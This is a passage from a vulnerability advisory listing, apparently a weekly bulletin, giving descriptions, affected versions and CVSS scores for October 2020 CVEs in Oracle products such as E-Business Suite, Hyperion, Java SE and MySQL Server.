Vulnerability in the Oracle BI Publisher product of Oracle Fusion Middleware (component: Mobile Service). Supported versions that are affected are 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle BI Publisher. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle BI Publisher, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle BI Publisher accessible data as well as unauthorized update, insert or delete access to some of Oracle BI Publisher accessible data. CVSS 3.1 Base Score 8.2 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N). 2020-10-21 not yet calculated CVE-2020-14784
MISC
oracle — business_intelligence_enterprise_edition
 
Vulnerability in the Oracle Business Intelligence Enterprise Edition product of Oracle Fusion Middleware (component: Analytics Actions). Supported versions that are affected are 5.5.0.0.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Business Intelligence Enterprise Edition. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Business Intelligence Enterprise Edition, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Business Intelligence Enterprise Edition accessible data as well as unauthorized read access to a subset of Oracle Business Intelligence Enterprise Edition accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Business Intelligence Enterprise Edition. CVSS 3.1 Base Score 7.1 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L). 2020-10-21 not yet calculated CVE-2020-14843
MISC
oracle — communications_diameter_signaling_router
 
Vulnerability in the Oracle Communications Diameter Signaling Router (DSR) product of Oracle Communications (component: User Interface). Supported versions that are affected are 8.0.0.0-8.4.0.5. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Communications Diameter Signaling Router (DSR). Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Communications Diameter Signaling Router (DSR), attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Communications Diameter Signaling Router (DSR) accessible data as well as unauthorized read access to a subset of Oracle Communications Diameter Signaling Router (DSR) accessible data. CVSS 3.1 Base Score 6.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N). 2020-10-21 not yet calculated CVE-2020-14788
MISC
oracle — communications_diameter_signaling_router
 
Vulnerability in the Oracle Communications Diameter Signaling Router (DSR) product of Oracle Communications (component: User Interface). Supported versions that are affected are 8.0.0.0-8.4.0.5. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Communications Diameter Signaling Router (DSR). Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Communications Diameter Signaling Router (DSR), attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Communications Diameter Signaling Router (DSR) accessible data as well as unauthorized read access to a subset of Oracle Communications Diameter Signaling Router (DSR) accessible data. CVSS 3.1 Base Score 5.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N). 2020-10-21 not yet calculated CVE-2020-14787
MISC
oracle — e-business_suite
 
Vulnerability in the Oracle Application Object Library product of Oracle E-Business Suite (component: Diagnostics). Supported versions that are affected are 12.1.3 and 12.2.3 – 12.2.10. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Application Object Library. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Application Object Library, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Application Object Library accessible data. CVSS 3.1 Base Score 4.7 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N). 2020-10-21 not yet calculated CVE-2020-14840
MISC
oracle — e-business_suite
 
Vulnerability in the Oracle Trade Management product of Oracle E-Business Suite (component: User Interface). Supported versions that are affected are 12.1.1 – 12.1.3 and 12.2.3 – 12.2.10. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Trade Management. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Trade Management accessible data as well as unauthorized access to critical data or complete access to all Oracle Trade Management accessible data. CVSS 3.1 Base Score 9.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N). 2020-10-21 not yet calculated CVE-2020-14876
MISC
MISC
oracle — e-business_suite
 
Vulnerability in the Oracle CRM Technical Foundation product of Oracle E-Business Suite (component: Preferences). Supported versions that are affected are 12.1.1 – 12.1.3 and 12.2.3 – 12.2.10. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle CRM Technical Foundation. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle CRM Technical Foundation. CVSS 3.1 Base Score 7.5 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H). 2020-10-21 not yet calculated CVE-2020-14774
MISC
oracle — e-business_suite
 
Vulnerability in the Oracle Marketing product of Oracle E-Business Suite (component: Marketing Administration). Supported versions that are affected are 12.1.1 – 12.1.3 and 12.2.3 – 12.2.10. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Marketing. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Marketing, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Marketing accessible data as well as unauthorized update, insert or delete access to some of Oracle Marketing accessible data. CVSS 3.1 Base Score 8.2 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N). 2020-10-21 not yet calculated CVE-2020-14831
MISC
oracle — e-business_suite
 
Vulnerability in the Oracle Marketing product of Oracle E-Business Suite (component: Marketing Administration). Supported versions that are affected are 12.1.1 – 12.1.3 and 12.2.3 – 12.2.10. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Marketing. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Marketing accessible data as well as unauthorized access to critical data or complete access to all Oracle Marketing accessible data. CVSS 3.1 Base Score 9.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N). 2020-10-21 not yet calculated CVE-2020-14875
MISC
oracle — e-business_suite
 
Vulnerability in the Oracle Trade Management product of Oracle E-Business Suite (component: User Interface). Supported versions that are affected are 12.1.1 – 12.1.3 and 12.2.3 – 12.2.10. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Trade Management. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Trade Management, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Trade Management accessible data as well as unauthorized update, insert or delete access to some of Oracle Trade Management accessible data. CVSS 3.1 Base Score 8.2 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N). 2020-10-21 not yet calculated CVE-2020-14851
MISC
oracle — e-business_suite
 
Vulnerability in the Oracle CRM Technical Foundation product of Oracle E-Business Suite (component: Flex Fields). Supported versions that are affected are 12.1.3 and 12.2.3 – 12.2.10. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle CRM Technical Foundation. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle CRM Technical Foundation, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle CRM Technical Foundation accessible data as well as unauthorized update, insert or delete access to some of Oracle CRM Technical Foundation accessible data. CVSS 3.1 Base Score 8.2 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N). 2020-10-21 not yet calculated CVE-2020-14850
MISC
oracle — hospitality_opera_5_property_services
 
Vulnerability in the Oracle Hospitality OPERA 5 Property Services product of Oracle Hospitality Applications (component: Logging). Supported versions that are affected are 5.5 and 5.6. Easily exploitable vulnerability allows high privileged attacker with network access via HTTP to compromise Oracle Hospitality OPERA 5 Property Services. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Hospitality OPERA 5 Property Services accessible data as well as unauthorized access to critical data or complete access to all Oracle Hospitality OPERA 5 Property Services accessible data. CVSS 3.1 Base Score 6.5 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N). 2020-10-21 not yet calculated CVE-2020-14877
MISC
oracle — hospitality_res_3700
 
Vulnerability in the Oracle Hospitality RES 3700 product of Oracle Food and Beverage Applications (component: CAL). The supported version that is affected is 5.7. Easily exploitable vulnerability allows unauthenticated attacker with network access via TCP to compromise Oracle Hospitality RES 3700. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle Hospitality RES 3700 accessible data. CVSS 3.1 Base Score 5.3 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N). 2020-10-21 not yet calculated CVE-2020-14783
MISC
oracle — hyperion
 
Vulnerability in the Hyperion Lifecycle Management product of Oracle Hyperion (component: Shared Services). The supported version that is affected is 11.1.2.4. Difficult to exploit vulnerability allows high privileged attacker with network access via HTTP to compromise Hyperion Lifecycle Management. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Hyperion Lifecycle Management accessible data. CVSS 3.1 Base Score 4.2 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:N/I:H/A:N). 2020-10-21 not yet calculated CVE-2020-14772
MISC
oracle — hyperion
 
Vulnerability in the Hyperion BI+ product of Oracle Hyperion (component: IQR-Foundation service). The supported version that is affected is 11.1.2.4. Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise Hyperion BI+. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Hyperion BI+ accessible data. CVSS 3.1 Base Score 2.0 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:L/I:N/A:N). 2020-10-21 not yet calculated CVE-2020-14770
MISC
oracle — hyperion
 
Vulnerability in the Hyperion Analytic Provider Services product of Oracle Hyperion (component: Smart View Provider). The supported version that is affected is 11.1.2.4. Difficult to exploit vulnerability allows low privileged attacker with access to the physical communication segment attached to the hardware where the Hyperion Analytic Provider Services executes to compromise Hyperion Analytic Provider Services. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Hyperion Analytic Provider Services accessible data as well as unauthorized read access to a subset of Hyperion Analytic Provider Services accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Hyperion Analytic Provider Services. CVSS 3.1 Base Score 4.3 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:A/AC:H/PR:L/UI:R/S:U/C:L/I:L/A:L). 2020-10-21 not yet calculated CVE-2020-14768
MISC
oracle — hyperion_infrastructure_technology
 
Vulnerability in the Hyperion Infrastructure Technology product of Oracle Hyperion (component: UI and Visualization). The supported version that is affected is 11.1.2.4. Easily exploitable vulnerability allows high privileged attacker with network access via HTTP to compromise Hyperion Infrastructure Technology. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Hyperion Infrastructure Technology accessible data as well as unauthorized access to critical data or complete access to all Hyperion Infrastructure Technology accessible data. CVSS 3.1 Base Score 6.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:N). 2020-10-21 not yet calculated CVE-2020-14854
MISC
oracle — java_se
 
Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Serialization). Supported versions that are affected are Java SE: 7u271, 8u261, 11.0.8 and 15; Java SE Embedded: 8u261. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded. Note: Applies to client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.1 Base Score 3.7 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L). 2020-10-21 not yet calculated CVE-2020-14779
CONFIRM
MISC
oracle — java_se
 
Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Libraries). Supported versions that are affected are Java SE: 7u271, 8u261, 11.0.8 and 15; Java SE Embedded: 8u261. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Java SE, Java SE Embedded accessible data. Note: Applies to client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.1 Base Score 3.7 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N). 2020-10-21 not yet calculated CVE-2020-14782
CONFIRM
MISC
oracle — java_se
 
Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: JNDI). Supported versions that are affected are Java SE: 7u271, 8u261, 11.0.8 and 15; Java SE Embedded: 8u261. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Java SE, Java SE Embedded accessible data. Note: Applies to client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.1 Base Score 3.7 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N). 2020-10-21 not yet calculated CVE-2020-14781
CONFIRM
MISC
oracle — java_se
 
Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Hotspot). Supported versions that are affected are Java SE: 7u271, 8u261, 11.0.8 and 15; Java SE Embedded: 8u261. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Java SE, Java SE Embedded accessible data as well as unauthorized read access to a subset of Java SE, Java SE Embedded accessible data. Note: Applies to client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.1 Base Score 4.2 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:N). 2020-10-21 not yet calculated CVE-2020-14792
CONFIRM
MISC
oracle — java_se
 
Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Libraries). Supported versions that are affected are Java SE: 7u271, 8u261, 11.0.8 and 15; Java SE Embedded: 8u261. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Java SE, Java SE Embedded accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 3.1 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:N). 2020-10-21 not yet calculated CVE-2020-14798
CONFIRM
MISC
oracle — java_se
 
Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Libraries). Supported versions that are affected are Java SE: 7u271, 8u261, 11.0.8 and 15; Java SE Embedded: 8u261. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Java SE, Java SE Embedded accessible data. Note: Applies to client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.1 Base Score 3.7 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N). 2020-10-21 not yet calculated CVE-2020-14797
CONFIRM
MISC
oracle — java_se
 
Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Libraries). Supported versions that are affected are Java SE: 7u271, 8u261, 11.0.8 and 15; Java SE Embedded: 8u261. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Java SE, Java SE Embedded accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 3.1 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N). 2020-10-21 not yet calculated CVE-2020-14796
CONFIRM
MISC
oracle — mysql Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Security: Privileges). Supported versions that are affected are 8.0.21 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized read access to a subset of MySQL Server accessible data. CVSS 3.1 Base Score 4.3 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N). 2020-10-21 not yet calculated CVE-2020-14838
CONFIRM
MISC
oracle — mysql Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: X Plugin). Supported versions that are affected are 8.0.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H). 2020-10-21 not yet calculated CVE-2020-14870
CONFIRM
MISC
oracle — mysql Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: DDL). Supported versions that are affected are 5.6.49 and prior, 5.7.31 and prior and 8.0.21 and prior. Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.4 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H). 2020-10-21 not yet calculated CVE-2020-14867
CONFIRM
MISC
oracle — mysql Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Logging). Supported versions that are affected are 8.0.21 and prior. Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.4 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H). 2020-10-21 not yet calculated CVE-2020-14873
CONFIRM
MISC
oracle — mysql Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H). 2020-10-21 not yet calculated CVE-2020-14866
CONFIRM
MISC
oracle — mysql Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 5.6.49 and prior, 5.7.31 and prior and 8.0.21 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H). 2020-10-21 not yet calculated CVE-2020-14769
CONFIRM
MISC
oracle — mysql Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Security: LDAP Auth). Supported versions that are affected are 5.7.31 and prior and 8.0.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H). 2020-10-21 not yet calculated CVE-2020-14869
CONFIRM
MISC
oracle — mysql Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H). 2020-10-21 not yet calculated CVE-2020-14868
CONFIRM
MISC
oracle — mysql
 
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H). 2020-10-21 not yet calculated CVE-2020-14773
CONFIRM
MISC
oracle — mysql
 
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Charsets). Supported versions that are affected are 8.0.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H). 2020-10-21 not yet calculated CVE-2020-14852
CONFIRM
MISC
oracle — mysql
 
Vulnerability in the MySQL Server product of Oracle MySQL (component: InnoDB). Supported versions that are affected are 5.7.31 and prior and 8.0.21 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H). 2020-10-21 not yet calculated CVE-2020-14775
CONFIRM
MISC
oracle — mysql
 
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Security: Encryption). Supported versions that are affected are 8.0.21 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H). 2020-10-21 not yet calculated CVE-2020-14800
CONFIRM
MISC
oracle — mysql
 
Vulnerability in the MySQL Server product of Oracle MySQL (component: InnoDB). Supported versions that are affected are 5.7.31 and prior and 8.0.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H). 2020-10-21 not yet calculated CVE-2020-14776
CONFIRM
MISC
oracle — mysql
 
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H). 2020-10-21 not yet calculated CVE-2020-14777
CONFIRM
MISC
oracle — mysql
 
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Locking). Supported versions that are affected are 5.6.49 and prior, 5.7.31 and prior and 8.0.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H). 2020-10-21 not yet calculated CVE-2020-14812
CONFIRM
MISC
oracle — mysql
 
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Security: LDAP Auth). Supported versions that are affected are 8.0.21 and prior. Easily exploitable vulnerability allows low privileged attacker with access to the physical communication segment attached to the hardware where the MySQL Server executes to compromise MySQL Server. Successful attacks of this vulnerability can result in takeover of MySQL Server. CVSS 3.1 Base Score 8.0 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H). 2020-10-21 not yet calculated CVE-2020-14878
CONFIRM
MISC
oracle — mysql
 
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Security: LDAP Auth). Supported versions that are affected are 5.7.31 and prior and 8.0.21 and prior. Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of MySQL Server. CVSS 3.1 Base Score 2.2 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:L). 2020-10-21 not yet calculated CVE-2020-14771
CONFIRM
MISC
oracle — mysql
 
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Stored Procedure). Supported versions that are affected are 5.6.49 and prior, 5.7.31 and prior and 8.0.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H). 2020-10-21 not yet calculated CVE-2020-14672
CONFIRM
MISC
oracle — mysql
 
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H). 2020-10-21 not yet calculated CVE-2020-14861
CONFIRM
MISC
oracle — mysql
 
